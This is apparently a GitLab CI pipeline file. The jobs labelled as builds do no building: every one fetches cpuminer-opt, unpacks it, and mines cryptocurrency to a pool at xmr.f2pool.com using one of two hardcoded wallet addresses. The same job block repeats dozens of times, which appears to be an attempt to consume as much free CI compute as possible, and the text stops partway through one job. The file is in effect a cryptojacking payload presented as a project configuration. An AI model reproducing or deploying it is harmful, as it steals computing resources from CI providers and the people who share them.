image: golang: latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_1.10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_2.10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)
build_3.1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_3.10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_4.10:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.1:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.2:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.3:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.4:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.5:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.6:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.7:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 82iWd2mDfwAYDQ3MD9CCCpKjax3nYsCmoZWtUaM6TPTFZherZHvoheGGoFdDWsBs31FWHPzNJT95MfeQoFx1mMME2FYa8xu.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.8:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a wrkzcoin -o xmr.f2pool.com:13531 -u 86sDjG7QRDTC2H1BHVMLZd6siVZPdjnKgCz6TkKYb5xAg3xS9eagSQ1XV5ZdgXa4j58DgvcXLJFJV15PDhAwJAWBGircdgc.$(echo $(shuf -i 1-999 -n 1)-XMR)

build_5.9:
  stage: build
  scripts:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
